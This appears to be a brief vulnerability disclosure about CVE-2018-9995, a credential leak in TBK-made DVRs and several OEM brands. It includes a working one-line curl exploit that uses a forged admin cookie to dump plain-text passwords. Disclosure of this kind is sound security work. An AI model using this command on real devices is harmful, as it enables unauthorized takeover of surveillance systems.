A vulnerability which provides plain text credentials for affected DVRs was discovered by Argentinian researcher Ezequiel Fernandez. This vulnerability is is outlined in CVE-2018-9995.
The DVRs affected are manufacturer by TBK as well as OEM'd by:
- CeNova
- DVR Login
- HVR Login
- MDVR Login
- Night OWL
- Novo
- Pulnix
- QSee
- Securus
- XVR 5 in 1
The exploit, tested by IPVM, is a simple CURL command:
curl "http://IP_ADDR/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
This PoC is tested and working as shown below. The command is issued on a vulnerable DVR (IP address obscured), and the password is returned (obscured / replaced with red PW).
The plain text credentials returned from this command granted admin access to the device.